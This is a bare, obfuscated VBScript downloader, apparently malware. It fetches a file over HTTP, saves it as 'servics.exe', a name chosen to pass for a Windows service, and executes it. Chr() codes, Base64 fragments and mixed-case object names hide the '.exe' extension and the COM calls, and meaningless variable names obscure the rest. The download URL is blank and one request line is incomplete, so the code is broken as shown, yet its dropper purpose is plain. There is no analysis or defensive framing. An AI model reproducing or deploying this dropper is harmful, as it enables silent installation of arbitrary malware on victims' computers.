Call parent() Sub parent() strFileURL = "" strHDLocation = "servics." & Chr(101) & Chr(120) & Chr(101) k = janu(strFileURL,strHDLocation) Set fso = CreateObject("Scripting.FileSystemObject") If (fso.FileExists(strHDLocation)) Then CreateObject("WScript.Shell").run "servics." & Base64Decode("ZQ==") & Base64Decode("eA==") & "e" End If Set fso = Nothing End sub Function Base64Decode(ByVal base64String) Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") dataLength = Len(base64String) If dataLength Mod 4 <> 0 Then Err.Raise 1, "Base64Decode", "Bad Base64 string." Exit Function End If For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Err.Raise 2, "Base64Decode", "Bad character In Base64 string." Exit Function End If nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = String(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next Base64Decode = sOut End Function function janu(strFileURL,strHDLocation) Set walabapoi = CreateObject("MsXmL2.xMLhTtP") "GET", strFileURL, false walabapoi.send() If walabapoi.Status = 200 Then Set Newujapi = CreateObject("AdOdB.sTrEam") Newujapi.Open Newujapi.Type = 1 Newujapi.Write walabapoi.ResponseBody Newujapi.Position = 0 Newujapi.SaveToFile strHDLocation Newujapi.Close Set Newujapi = Nothing End if Set walabapoi = Nothing end function